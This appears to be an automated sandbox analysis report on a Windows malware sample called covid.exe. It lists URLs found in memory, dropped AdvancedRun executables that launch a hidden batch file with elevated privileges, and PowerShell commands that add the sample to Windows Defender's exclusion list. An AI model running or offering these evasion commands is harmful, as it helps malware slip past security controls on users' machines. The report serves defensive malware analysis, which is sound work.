Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://quantcast.mgr.consensu.org
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0C
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://trinitymirror.grapeshot.co.uk/
Source: covid.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M3TH25P
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/champions-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/georginio-wijnaldum
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/mohamed-salah
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/steven-gerrard
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_02FFCF08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_02FF2780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_02FFCEF8
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
Source: covid.exeStatic PE information: invalid certificate
Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: covid.exe, 00000000.00000000.229590420.0000000000462000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: covid.exeBinary or memory string: OriginalFilenameahmed.exe, vs covid.exe
Source: classification engineClassification label: mal68.evad.winEXE@15/17@1/2
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwmJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ecJump to behavior
Source: covid.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\covid.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: covid.exeVirustotal: Detection: 40%
Source: covid.exeReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\covid.exeFile read: C:\Users\user\Desktop\covid.exe:Zone.IdentifierJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: covid.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: covid.exeStatic PE information: 0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040B50D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeJump to dropped file
Source: C:\Users\user\Desktop\covid.exeFile created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
